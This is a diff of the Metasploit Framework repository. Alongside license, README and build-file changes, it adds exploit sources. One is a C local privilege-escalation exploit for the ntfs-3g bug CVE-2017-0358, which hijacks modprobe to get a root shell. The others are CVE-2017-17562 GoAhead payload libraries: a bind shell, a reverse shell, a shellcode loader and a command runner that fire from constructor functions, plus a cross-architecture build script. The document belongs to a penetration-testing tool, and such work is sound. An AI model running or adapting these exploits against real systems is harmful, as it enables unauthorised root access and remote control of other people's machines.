-Copyright: 2008-2012 Tod Beardsley
-License: BSD-3-clause
-
 Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
 Copyright: 2005 Michael Neumann
 License: BSD-3-clause or Ruby
 
-Files: lib/openvas/*
-Copyright: No copyright statement provided
-License: MIT
-
 Files: lib/rabal/*
 Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
 License: Ruby
@@ -119,22 +95,10 @@ Files: lib/rbmysql.rb lib/rbmysql/*
 Copyright: 2009 tommy
 License: Ruby
 
-Files: lib/rbreadline.rb
-Copyright: 2009 Park Heesob
-License: BSD-3-clause
-
-Files: lib/rkelly/*
-Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette
-License: MIT
-
 Files: lib/snmp.rb lib/snmp/*
 Copyright: 2004, David R. Halliday
 License: Ruby
 
-Files: lib/sshkey.rb lib/sshkey/*
-Copyright: 2011 James Miller
-License: MIT
-
 Files: lib/windows_console_color_support.rb
 Copyright: 2011 Michael 'mihi' Schierl
 License: BSD-3-clause
@@ -151,132 +115,6 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT
 
-
-#
-# Gems
-#
-
-Files: activemodel
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: activerecord
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: activesupport
-Copyright: 2005-2011 David Heinemeier Hansson
-License: MIT
-
-Files: arel
-Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
-License: MIT
-
-Files: bcrypt
-Copyright: 2007-2011 Coda Hale
-License: MIT
-
-Files: builder
-Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
-License: MIT
-
-Files: database_cleaner
-Copyright: 2009 Ben Mabey
-License: MIT
-
-Files: diff-lcs
-Copyright: 2004-2011 Austin Ziegler
-License: MIT
-
-Files: factory_girl
-Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
-License: MIT
-
-Files: fivemat
-Copyright: 2012 Tim Pope
-License: MIT
-
-Files: i18n
-Copyright: 2008 The Ruby I18n team
-License: MIT
-
-Files: json
-Copyright: Daniel Luz <dev at mernen dot com>
-License: Ruby
-
-Files: metasploit_data_models
-Copyright: 2012 Rapid7, Inc.
-License: MIT
-
-Files: mini_portile
-Copyright: 2011 Luis Lavena
-License: MIT
-
-Files: msgpack
-Copyright: Austin Ziegler
-License: Ruby
-
-Files: multi_json
-Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
-License: MIT
-
-Files: network_interface
-Copyright: 2012, Rapid7, Inc.
-License: MIT
-
-Files: nokogiri
-Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
-License: MIT
-
-Files: packetfu
-Copyright: 2008-2012 Tod Beardsley
-License: BSD-3-clause
-
-Files: pcaprub
-Copyright: 2007-2008, Alastair Houghton
-License: LGPL-2.1
-
-Files: pg
-Copyright: 1997-2012 by the authors
-License: Ruby
-
-Files: rake
-Copyright: 2003, 2004 Jim Weirich
-License: MIT
-
-Files: redcarpet
-Copyright: 2009 Natacha Porté
-License: MIT
-
-Files: robots
-Copyright: 2008 Kyle Maxwell, contributors
-License: MIT
-
-Files: rspec
-Copyright: 2009 Chad Humphries, David Chelimsky
-License: MIT
-
-Files: shoulda-matchers
-Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
-License: MIT
-
-Files: simplecov
-Copyright: 2010-2012 Christoph Olszowka
-License: MIT
-
-Files: timecop
-Copyright: 2012 Travis Jeffery, John Trupiano
-License: MIT
-
-Files: tzinfo
-Copyright: 2005-2006 Philip Ross
-License: MIT
-
-Files: yard
-Copyright: 2007-2013 Loren Segal
-License: MIT
-
-
 License: BSD-2-clause
  Redistribution and use in source and binary forms, with or without modification,
  are permitted provided that the following conditions are met:

LICENSE_GEMS

@@ -0,0 +1,130 @@
+This file is auto-generated by tools/dev/update_gem_licenses.sh
+Ascii85, 1.0.2, MIT
+actionpack, 4.2.9, MIT
+actionview, 4.2.9, MIT
+activemodel, 4.2.9, MIT
+activerecord, 4.2.9, MIT
+activesupport, 4.2.9, MIT
+addressable, 2.5.1, "Apache 2.0"
+afm, 0.2.2, MIT
+arel, 6.0.4, MIT
+arel-helpers, 2.4.0, unknown
+backports, 3.8.0, MIT
+bcrypt, 3.1.11, MIT
+bindata, 2.4.0, ruby
+bit-struct, 0.16, ruby
+builder, 3.2.3, MIT
+bundler, 1.15.1, MIT
+coderay, 1.1.1, MIT
+diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
+dnsruby, 1.60.1, "Apache 2.0"
+docile, 1.1.5, MIT
+erubis, 2.7.0, MIT
+factory_girl, 4.8.0, MIT
+factory_girl_rails, 4.8.0, MIT
+faraday, 0.12.1, MIT
+filesize, 0.1.1, MIT
+fivemat, 1.3.5, MIT
+google-protobuf, 3.3.0, "New BSD"
+googleauth, 0.5.1, "Apache 2.0"
+grpc, 1.4.1, "New BSD"
+hashery, 2.1.2, "Simplified BSD"
+i18n, 0.8.6, MIT
+jsobfu, 0.4.2, "New BSD"
+json, 2.1.0, ruby
+jwt, 1.5.6, MIT
+little-plugger, 1.1.4, MIT
+logging, 2.2.2, MIT
+loofah, 2.0.3, MIT
+memoist, 0.16.0, MIT
+metasm, 1.0.3, LGPL
+metasploit-aggregator, 0.2.1, "New BSD"
+metasploit-concern, 2.0.5, "New BSD"
+metasploit-credential, 2.0.10, "New BSD"
+metasploit-framework, 4.15.0, "New BSD"
+metasploit-model, 2.0.4, "New BSD"
+metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 2.0.15, "New BSD"
+metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
+method_source, 0.8.2, MIT
+mini_portile2, 2.2.0, MIT
+minitest, 5.10.2, MIT
+msgpack, 1.1.0, "Apache 2.0"
+multi_json, 1.12.1, MIT
+multipart-post, 2.0.0, MIT
+nessus_rest, 0.1.6, MIT
+net-ssh, 4.1.0, MIT
+network_interface, 0.0.1, MIT
+nexpose, 6.1.0, BSD
+nokogiri, 1.8.0, MIT
+octokit, 4.7.0, MIT
+openssl-ccm, 1.2.1, MIT
+openvas-omp, 0.0.4, MIT
+os, 0.9.6, MIT
+packetfu, 1.1.13, BSD
+patch_finder, 1.0.2, "New BSD"
+pcaprub, 0.12.4, LGPL-2.1
+pdf-reader, 2.0.0, MIT
+pg, 0.20.0, "New BSD"
+pg_array_parser, 0.0.9, unknown
+postgres_ext, 3.0.0, MIT
+pry, 0.10.4, MIT
+public_suffix, 2.0.5, MIT
+rack, 1.6.8, MIT
+rack-test, 0.6.3, MIT
+rails-deprecated_sanitizer, 1.0.3, MIT
+rails-dom-testing, 1.0.8, MIT
+rails-html-sanitizer, 1.0.3, MIT
+railties, 4.2.9, MIT
+rake, 12.0.0, MIT
+rb-readline, 0.5.4, BSD
+recog, 2.1.11, unknown
+redcarpet, 3.4.0, MIT
+rex-arch, 0.1.9, "New BSD"
+rex-bin_tools, 0.1.4, "New BSD"
+rex-core, 0.1.11, "New BSD"
+rex-encoder, 0.1.4, "New BSD"
+rex-exploitation, 0.1.15, "New BSD"
+rex-java, 0.1.5, "New BSD"
+rex-mime, 0.1.5, "New BSD"
+rex-nop, 0.1.1, "New BSD"
+rex-ole, 0.1.6, "New BSD"
+rex-powershell, 0.1.72, "New BSD"
+rex-random_identifier, 0.1.2, "New BSD"
+rex-registry, 0.1.3, "New BSD"
+rex-rop_builder, 0.1.3, "New BSD"
+rex-socket, 0.1.8, "New BSD"
+rex-sslscan, 0.1.4, "New BSD"
+rex-struct2, 0.1.2, "New BSD"
+rex-text, 0.2.15, "New BSD"
+rex-zip, 0.1.3, "New BSD"
+rkelly-remix, 0.0.7, MIT
+robots, 0.10.1, MIT
+rspec, 3.6.0, MIT
+rspec-core, 3.6.0, MIT
+rspec-expectations, 3.6.0, MIT
+rspec-mocks, 3.6.0, MIT
+rspec-rails, 3.6.0, MIT
+rspec-rerun, 1.1.0, MIT
+rspec-support, 3.6.0, MIT
+ruby-rc4, 0.1.5, MIT
+ruby_smb, 0.0.18, "New BSD"
+rubyntlm, 0.6.2, MIT
+rubyzip, 1.2.1, "Simplified BSD"
+sawyer, 0.8.1, MIT
+signet, 0.7.3, "Apache 2.0"
+simplecov, 0.14.1, MIT
+simplecov-html, 0.10.1, MIT
+slop, 3.6.0, MIT
+sqlite3, 1.3.13, "New BSD"
+sshkey, 1.9.0, MIT
+thor, 0.19.4, MIT
+thread_safe, 0.3.6, "Apache 2.0"
+timecop, 0.9.1, MIT
+ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.3, MIT
+tzinfo-data, 1.2017.2, MIT
+windows_error, 0.1.2, BSD
+xdr, 2.0.0, "Apache 2.0"
+xmlrpc, 0.3.0, ruby
+yard, 0.9.9, MIT

README.md

@@ -1,4 +1,4 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
 COPYING for more details.
@@ -9,20 +9,19 @@ Bug tracking and development information can be found at:
  https://github.com/rapid7/metasploit-framework
 
 New bugs and feature requests should be directed to:
-  http://r-7.co/MSF-BUGv1
+  https://r-7.co/MSF-BUGv1
 
 API documentation for writing modules can be found at:
   https://rapid7.github.io/metasploit-framework/api
 
-Questions and suggestions can be sent to:
-  https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
+Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
 
 Installing
 --
 
-Generally, you should use [the free installer](https://www.metasploit.com/download),
+Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
 which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](http://r-7.co/MSF-DEV) if
+few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
 you'd like to deal with dependencies on your own.
 
 Using Metasploit
@@ -45,6 +44,6 @@ pull request. For slightly more information, see
 [wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
 [wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
 [wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
-[unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
 
 

Rakefile

@@ -9,6 +9,20 @@ require 'metasploit/framework/spec/untested_payloads'
 # the user installs with `bundle install --without db`
 Metasploit::Framework::Require.optionally_active_record_railtie
 
+begin
+  require 'rspec/core'
+  require 'rspec-rerun/tasks'
+rescue LoadError
+  puts "rspec not in bundle, so can't set up spec tasks.  " \
+       "To run specs ensure to install the development and test groups."
+  puts "Bundle currently installed '--without #{Bundler.settings.without.join(' ')}'."
+  puts "To clear the without option do `bundle install --without ''` (the --without flag with an empty string) or " \
+       "`rm -rf .bundle` to remove the .bundle/config manually and then `bundle install`"
+else
+  require 'rspec/core/rake_task'
+  RSpec::Core::RakeTask.new(spec: 'db:test:prepare')
+end
+
 Metasploit::Framework::Application.load_tasks
 Metasploit::Framework::Spec::Constants.define_task
 Metasploit::Framework::Spec::Threads::Suite.define_task

Vagrantfile

@@ -3,10 +3,7 @@
 
 Vagrant.configure(2) do |config|
   config.ssh.forward_x11 = true
-  config.vm.box = "ubuntu/trusty64"
-  # TODO: find a minimal image that keeps up-to-date and
-  # supports multiple providers
-  #config.vm.box = "phusion/ubuntu-14.04-amd64"
+  config.vm.box = "ubuntu/xenial64"
   config.vm.network :forwarded_port, guest: 4444, host: 4444
   config.vm.provider "vmware" do |v|
 	  v.memory = 2048
@@ -26,14 +23,14 @@ Vagrant.configure(2) do |config|
   [ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
     "apt-get update",
     "apt-get dist-upgrade -y",
-    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg fortune postgresql postgresql-contrib",
+    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
   ].each do |step|
     config.vm.provision "shell", inline: step
   end
 
   [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
     "curl -L https://get.rvm.io | bash -s stable",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm --install .ruby-version",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
     "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
     "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
     "mkdir -p ~/.msf4",

data/exploits/CVE-2017-0358/sploit.c

@@ -0,0 +1,196 @@
+#define _GNU_SOURCE
+#include <stdbool.h>
+#include <errno.h>
+#include <sys/inotify.h>
+#include <unistd.h>
+#include <err.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <sys/eventfd.h>
+#include <signal.h>
+#include <poll.h>
+#include <stdio.h>
+#include <sys/prctl.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <time.h>
+#include <sys/utsname.h>
+
+int main(void) {
+  /* prevent shell from backgrounding ntfs-3g when stopped */
+  pid_t initial_fork_child = fork();
+  if (initial_fork_child == -1)
+    err(1, "initial fork");
+  if (initial_fork_child != 0) {
+    int status;
+    if (waitpid(initial_fork_child, &status, 0) != initial_fork_child)
+      err(1, "waitpid");
+    execl("rootshell", "rootshell", NULL);
+    exit(0);
+  }
+
+  char buf[1000] = {0};
+  // Set up workspace with volume, mountpoint, modprobe config and module directory.
+  char template[] = "/tmp/ntfs_sploit.XXXXXX";
+  if (mkdtemp(template) == NULL)
+    err(1, "mkdtemp");
+  char volume[100], mountpoint[100], modprobe_confdir[100], modprobe_conffile[100];
+  sprintf(volume, "%s/volume", template);
+  sprintf(mountpoint, "%s/mountpoint", template);
+  sprintf(modprobe_confdir, "%s/modprobe.d", template);
+  sprintf(modprobe_conffile, "%s/sploit.conf", modprobe_confdir);
+  if (mkdir(volume, 0777) || mkdir(mountpoint, 0777) || mkdir(modprobe_confdir, 0777))
+    err(1, "mkdir");
+  int conffd = open(modprobe_conffile, O_WRONLY|O_CREAT, 0666);
+  if (conffd == -1)
+    err(1, "open modprobe config");
+  int suidfile_fd = open("rootshell", O_RDONLY);
+  if (suidfile_fd == -1)
+    err(1, "unable to open ./rootshell");
+  char modprobe_config[200];
+  sprintf(modprobe_config, "alias fuse rootmod\noptions rootmod suidfile_fd=%d\n", suidfile_fd);
+  if (write(conffd, modprobe_config, strlen(modprobe_config)) != strlen(modprobe_config))
+    errx(1, "modprobe config write failed");
+  close(conffd);
+  // module directory setup
+  char system_cmd[1000];
+  sprintf(system_cmd, "mkdir -p %s/lib/modules/$(uname -r) && cp rootmod.ko *.bin %s/lib/modules/$(uname -r)/",
+    template, template);
+  if (system(system_cmd))
+    errx(1, "shell command failed");
+
+  // Set up inotify watch for /proc/mounts.
+  // Note: /proc/mounts is a symlink to /proc/self/mounts, so
+  // the watch will only see accesses by this process.
+  int inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
+    err(1, "unable to watch /proc/mounts");
+
+  // Set up inotify watch for /proc/filesystems.
+  // This can be used to detect whether we lost the race.
+  int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (fs_inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
+    err(1, "unable to watch /proc/filesystems");
+
+  // Set up inotify watch for /sbin/modprobe.
+  // This can be used to detect when we can release all our open files.
+  int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (modprobe_inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
+    err(1, "unable to watch /sbin/modprobe");
+
+  int do_exec_pipe[2];
+  if (pipe2(do_exec_pipe, O_CLOEXEC))
+    err(1, "pipe");
+  pid_t child = fork();
+  if (child == -1)
+    err(1, "fork");
+  if (child != 0) {
+    if (read(do_exec_pipe[0], buf, 1) != 1)
+      errx(1, "pipe read failed");
+    char modprobe_opts[300];
+    sprintf(modprobe_opts, "-C %s -d %s", modprobe_confdir, template);
+    setenv("MODPROBE_OPTIONS", modprobe_opts, 1);
+    execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
+  }
+  child = getpid();
+
+  // Now launch ntfs-3g and wait until it opens /proc/mounts
+  if (write(do_exec_pipe[1], buf, 1) != 1)
+    errx(1, "pipe write failed");
+
+  if (read(inotify_fd, buf, sizeof(buf)) <= 0)
+    errx(1, "inotify read failed");
+  if (kill(getppid(), SIGSTOP))
+    err(1, "can't stop setuid parent");
+
+  // Check whether we won the main race.
+  struct pollfd poll_fds[1] = {{
+    .fd = fs_inotify_fd,
+    .events = POLLIN
+  }};
+  int poll_res = poll(poll_fds, 1, 100);
+  if (poll_res == -1)
+    err(1, "poll");
+  if (poll_res == 1) {
+    puts("looks like we lost the race");
+    if (kill(getppid(), SIGKILL))
+      perror("SIGKILL after lost race");
+    char rm_cmd[100];
+    sprintf(rm_cmd, "rm -rf %s", template);
+    system(rm_cmd);
+    exit(1);
+  }
+  puts("looks like we won the race");
+
+  // Open as many files as possible. Whenever we have
+  // a bunch of open files, move them into a new process.
+  int total_open_files = 0;
+  while (1) {
+    #define LIMIT 500
+    int open_files[LIMIT];
+    bool reached_limit = false;
+    int n_open_files;
+    for (n_open_files = 0; n_open_files < LIMIT; n_open_files++) {
+      open_files[n_open_files] = eventfd(0, 0);
+      if (open_files[n_open_files] == -1) {
+        if (errno != ENFILE)
+          err(1, "eventfd() failed");
+        printf("got ENFILE at %d total\n", total_open_files);
+        reached_limit = true;
+        break;
+      }
+      total_open_files++;
+    }
+    pid_t fd_stasher_child = fork();
+    if (fd_stasher_child == -1)
+      err(1, "fork (for eventfd holder)");
+    if (fd_stasher_child == 0) {
+      prctl(PR_SET_PDEATHSIG, SIGKILL);
+      // close PR_SET_PDEATHSIG race window
+      if (getppid() != child) raise(SIGKILL);
+      while (1) pause();
+    }
+    for (int i = 0; i < n_open_files; i++)
+      close(open_files[i]);
+    if (reached_limit)
+      break;
+  }
+
+  // Wake up ntfs-3g and keep allocating files, then free up
+  // the files as soon as we're reasonably certain that either
+  // modprobe was spawned or the attack failed.
+  if (kill(getppid(), SIGCONT))
+    err(1, "SIGCONT");
+
+  time_t start_time = time(NULL);
+  while (1) {
+    for (int i=0; i<1000; i++) {
+      int efd = eventfd(0, 0);
+      if (efd == -1 && errno != ENFILE)
+        err(1, "gapfiller eventfd() failed unexpectedly");
+    }
+    struct pollfd modprobe_poll_fds[1] = {{
+      .fd = modprobe_inotify_fd,
+      .events = POLLIN
+    }};
+    int modprobe_poll_res = poll(modprobe_poll_fds, 1, 0);
+    if (modprobe_poll_res == -1)
+      err(1, "poll");
+    if (modprobe_poll_res == 1) {
+      puts("yay, modprobe ran!");
+      exit(0);
+    }
+    if (time(NULL) > start_time + 3) {
+      puts("modprobe didn't run?");
+      exit(1);
+    }
+  }
+}

data/exploits/CVE-2017-17562/build.sh

@@ -0,0 +1,48 @@
+#!/bin/bash
+
+build () {
+  CC=$1
+  TARGET_SUFFIX=$2
+  CFLAGS=$3
+
+  echo "[*] Building for ${TARGET_SUFFIX}..."
+  for type in {shellcode,system,reverse,bind}
+   do ${CC} ${CFLAGS} -Wall -fPIC -fno-stack-protector -Os goahead-cgi-${type}.c -s -shared -o goahead-cgi-${type}-${TARGET_SUFFIX}.so
+  done
+}
+
+rm -f *.o *.so *.gz
+
+#
+# Linux GLIBC
+#
+
+# x86
+build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
+build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
+
+# ARM
+build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
+build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
+build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
+
+# MIPS
+build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
+build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
+build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
+build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
+
+# SPARC
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
+
+# PowerPC
+build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
+build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
+build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
+
+# S390X
+build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
+
+gzip -9 *.so
+rm -f *.o *.so

data/exploits/CVE-2017-17562/goahead-cgi-bind.c

@@ -0,0 +1,96 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _bind_tcp_shell(void) {
+
+  int sfd, fd, i;
+  struct sockaddr_in addr,saddr;
+  unsigned int saddr_len = sizeof(struct sockaddr_in);
+
+  char *lport = "55555";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  sfd = socket(AF_INET, SOCK_STREAM, 0);
+  setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
+
+  saddr.sin_family = AF_INET;
+  saddr.sin_port = htons(atoi(lport));
+  saddr.sin_addr.s_addr = INADDR_ANY;
+  bzero(&saddr.sin_zero, 8);
+
+  if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
+    exit(1);
+  }
+
+  if (listen(sfd, 5) == -1) {
+    close(sfd);
+    exit(1);
+  }
+
+  fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
+  close(sfd);
+
+  if (fd == -1) {
+    exit(1);
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _bind_tcp_shell();
+
+    exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-reverse.c

@@ -0,0 +1,84 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _reverse_tcp_shell(void) {
+
+  int fd, i;
+  struct sockaddr_in addr;
+  char *lport = "55555";
+  char *lhost = "000.000.000.000";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  fd = socket(PF_INET, SOCK_STREAM, 0);
+  addr.sin_port = htons(atoi(lport));
+  addr.sin_addr.s_addr = inet_addr(lhost);
+  addr.sin_family = AF_INET;
+
+  memset(addr.sin_zero, 0, sizeof(addr.sin_zero));
+
+  for (i=0; i<10; i++) {
+    if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
+      break;
+    }
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _reverse_tcp_shell();
+
+    exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-shellcode.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <signal.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver mmap,mmap@GLIBC_2.0");
+__asm__(".symver memcpy,memcpy@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver mmap,mmap@GLIBC_2.2.5");
+__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+  void *mem;
+  void (*fn)();
+
+  unsetenv("LD_PRELOAD");
+
+  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
+  if (mem == MAP_FAILED)
+    return;
+
+  memcpy(mem, payload, PAYLOAD_SIZE);
+  fn = (void(*)())mem;
+
+  if (! fork())
+    fn();
+
+  exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-system.c

@@ -0,0 +1,32 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    int dummy = 0;
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      dummy = system((const char*)payload);
+
+    exit(dummy);
+}

data/exploits/CVE-2017-17562/install-deps.sh

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Assume x86_64 Ubuntu 16.04 base system
+apt-get install build-essential \
+  gcc-5-multilib \
+  gcc-5-multilib-arm-linux-gnueabi \
+  gcc-5-multilib-arm-linux-gnueabihf \
+  gcc-5-multilib-mips-linux-gnu \
+  gcc-5-multilib-mips64-linux-gnuabi64 \
+  gcc-5-multilib-mips64el-linux-gnuabi64 \
+  gcc-5-multilib-mipsel-linux-gnu \
+  gcc-5-multilib-powerpc-linux-gnu \
